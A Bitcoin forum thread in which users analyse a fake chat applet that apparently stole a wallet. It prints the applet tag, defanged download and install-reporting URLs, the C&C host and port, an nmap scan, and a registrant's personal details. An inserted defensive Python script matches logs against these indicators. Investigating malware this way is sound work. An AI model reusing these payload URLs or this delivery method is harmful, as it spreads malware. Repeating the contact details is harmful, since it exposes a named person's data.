Bitcoin Forum
Author Topic: deleted  (Read 3085 times)
vipes2010 (OP)
Newbie
Activity: 3
Merit: 0
April 19, 2013, 04:40:03 PM
Last edit: October 24, 2014, 09:35:07 PM by vipes2010
 #1

deleted
wumpus
Hero Member
Activity: 812
Merit: 1022
No Maps for These Territories
April 19, 2013, 05:17:10 PM
 #2

There are multiple possibilities:

- Weak passphrase

- He still had an unencrypted copy of the wallet around on his system

- An unencrypted copy of the wallet was still somewhere in the unallocated/deleted part of the file system (if the exploit scans the raw disk)

- He did type the wallet passphrase (and it got keylogged) but forgot about it

I'm sure that all problems with unencrypted keys staying behind in the wallet.dat are solved in 0.8.0 (in 0.6.0 already). When you encrypt, or upgrade from an older insecure version (versions 0.4.0 and 0.5.0rc), the wallet is re-written without any unencrypted keys remaining behind in the slack space of the database. Also, all keys that were in the wallet before encryption are marked so they will not be used anymore.

If you're really paranoid about "unencrypted keys staying behind in unallocated space in the file system", an additional security mechanism is to send all your coins to a receiving address that is generated after the wallet is encrypted.

Bitcoin Core developer. Warning: For most, coin loss is a larger risk than coin theft. A disk can die any time. Regularly back up your wallet through File > Backup Wallet to an external storage or the (encrypted!) cloud. Use a separate offline wallet for storing larger amounts.
Nicolai
Newbie
Activity: 39
Merit: 0
April 19, 2013, 06:30:10 PM
Last edit: April 19, 2013, 11:03:07 PM by Nicolai
 #3

The webpage with the exploit: hXXp://coinchat.freetzi.com/blank.html

Code:
<applet name='Coin Chat Client' width='900' height='450' code='wFidEABfB.class' archive='wFidEABfB.jar'></applet>

The .jar contains:

The malware: hXXp://fuskbugg.se/dl/f1adsy/smss2.exe (virustotal)
(I have sent the file to a lot of A/V vendors, so hopefully the detection rate will soon be better)

And a badly obfuscated "logger":
Quote
hXXp://galaxyjdb.com/insert.php?&o= OS.name &u=thewinner1234&ip= IP &e= paramString
(could be some kind of pay-by-install?)
paramString can be "Noa", "Noc", "Yes", "Nod"

(also "http" has been changed to "hXXp", just in case. NEVER click ANY of these links, unless you know what you're doing).

EDIT1:
The malware C&C server = service2012.no-ip.biz = 63.141.253.124 (port 91)

coinchat.freetzi.com = 69.162.82.249
fuskbugg.se = 88.80.2.12
galaxyjdb.com = 109.163.233.106

galaxyjdb.com is owned by:
Code:
Quick Ware
   Alex B (sblfc1234@gmail.com)
   +44.7543642587
   Fax: +1.5555555555
   8 does it matter road
   Liverpool, merseyside l17 7ja
   GB

EDIT2:
The .jar exploit contains:
Code:
k{ol~puuly89:
Coded By Orpheu
The Responsibility in the use of this is on the user not the coder
(Orpheu's skype = izroda6)

And the C&C server is most likely made using this tutorial: http://www.hackforums.net/showthread.php?tid=145184
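As an added defender-side example that is not from this thread or its posters: a small Python triage script that matches egress log lines against the hostnames, resolved addresses, C&C port and logger URL pattern reported in the post above. The log line format and the sample log lines are constructed for the example; only the indicator values come from the post.

```python
import re
from urllib.parse import parse_qs, urlparse

# Indicators as reported in the post above (EDIT1 and the "logger" URL).
IOC_HOSTS = {"coinchat.freetzi.com": "applet landing page", "fuskbugg.se": "payload host",
             "galaxyjdb.com": "install logger", "service2012.no-ip.biz": "C&C server"}
IOC_IPS = {"69.162.82.249": "coinchat.freetzi.com", "88.80.2.12": "fuskbugg.se",   # resolved addresses
           "109.163.233.106": "galaxyjdb.com", "63.141.253.124": "service2012.no-ip.biz"}
CC_IP, CC_PORT = "63.141.253.124", 91
LOGGER_STATES = {"Noa", "Noc", "Yes", "Nod"}  # values the post lists for the e= parameter

# Assumed egress-log format (constructed for this example, not a real product's format):
#   <timestamp> <client_ip> <dst_ip> <dst_port> <url, or "-" for non-HTTP flows>
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\S+)$")

def classify(line):
    """Return the indicator labels one log line matches (empty list = no match)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    _ts, _client, dst_ip, dst_port, url = m.groups()
    parsed = urlparse(url) if url != "-" else None
    host = parsed.hostname if parsed else None
    hits = []
    # Match on hostname first, then on the resolved IP (the DNS answer may change later).
    role = IOC_HOSTS.get(host) or IOC_HOSTS.get(IOC_IPS.get(dst_ip, ""))
    if role:
        hits.append(role)
    if dst_ip == CC_IP and int(dst_port) == CC_PORT:
        hits.append("C&C beacon on port 91")
    if host == "galaxyjdb.com" and parsed.path == "/insert.php":
        state = parse_qs(parsed.query).get("e", [""])[0]
        if state in LOGGER_STATES:
            hits.append(f"install report e={state}")
    return hits

def infected_clients(lines):
    """Client IPs with at least one indicator match, for triage."""
    return {LOG_RE.match(l).group(2) for l in lines if classify(l)}

# Constructed sample log: one client walks the whole chain, another is clean.
SAMPLE_LOG = [
    "2013-04-19T16:02:11Z 10.0.0.5 69.162.82.249 80 http://coinchat.freetzi.com/blank.html",
    "2013-04-19T16:02:13Z 10.0.0.5 88.80.2.12 80 http://fuskbugg.se/dl/f1adsy/smss2.exe",
    "2013-04-19T16:02:20Z 10.0.0.5 109.163.233.106 80 http://galaxyjdb.com/insert.php?&o=Windows&u=thewinner1234&ip=10.0.0.5&e=Yes",
    "2013-04-19T16:02:25Z 10.0.0.5 63.141.253.124 91 -",
    "2013-04-19T16:03:00Z 10.0.0.7 93.184.216.34 443 https://www.example.org/",
]
```

Because the dynamic-DNS C&C name can be repointed, the IP fallback in `classify` catches the port 91 beacon even when the log carries no hostname.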
Mike Hearn
Legendary
Activity: 1526
Merit: 1134
April 19, 2013, 06:35:55 PM
 #4

As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.
interfect
Full Member
Activity: 141
Merit: 100
April 20, 2013, 12:58:42 AM
 #5

Holy Nmap Batman!

Code:
$ nmap 63.141.253.124

Starting Nmap 6.00 ( http://nmap.org ) at 2013-04-19 17:58 PDT
Nmap scan report for 63.141.253.124
Host is up (0.11s latency).
Not shown: 973 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
25/tcp    filtered smtp
80/tcp    open     http
135/tcp   filtered msrpc
139/tcp   filtered netbios-ssn
211/tcp   filtered 914c-g
445/tcp   filtered microsoft-ds
500/tcp   filtered isakmp
513/tcp   filtered login
666/tcp   filtered doom
1100/tcp  filtered mctp
1999/tcp  filtered tcp-id-port
2000/tcp  filtered cisco-sccp
2030/tcp  filtered device2
3006/tcp  filtered deslogind
3306/tcp  open     mysql
3814/tcp  filtered neto-dcs
5000/tcp  filtered upnp
6001/tcp  filtered X11:1
7938/tcp  filtered lgtomapper
8800/tcp  filtered sunwebadmin
8888/tcp  filtered sun-answerbook
9002/tcp  filtered dynamid
9290/tcp  filtered unknown
10215/tcp filtered unknown
40911/tcp filtered unknown
60020/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 18.23 seconds

Nicolai
Newbie
Activity: 39
Merit: 0
April 20, 2013, 11:40:56 PM
 #6

Mike Hearn: You are right, it does not exploit any flaws in Java (it just asks for permission, then downloads and runs the malware).
K1773R
Legendary
Activity: 1792
Merit: 1008
/dev/null
April 21, 2013, 12:23:04 AM
 #7

Quote from: Mike Hearn on April 19, 2013, 06:35:55 PM
As far as I could tell it's not an exploit - I didn't see any obviously tricky code. It just looks like a regular applet that downloads and runs an EXE file to me. The EXE itself claims to be a compiled AutoIt script so, again, I am skeptical it's very sophisticated. The guy in question said he was using Chrome but it looked like a chat app so he gave it full permissions.

If someone provides the AutoIt binary, I'll decompile it ;)

K1773R
Legendary
Activity: 1792
Merit: 1008
/dev/null
April 22, 2013, 11:35:58 AM
 #8

Unfortunately the code has been obfuscated, but you can still find out what it does; it just takes more time to understand it ;)
If someone is interested in it, send me a message and I'll send it to you (without the binary, of course!). I don't want to host this code since it's malware!
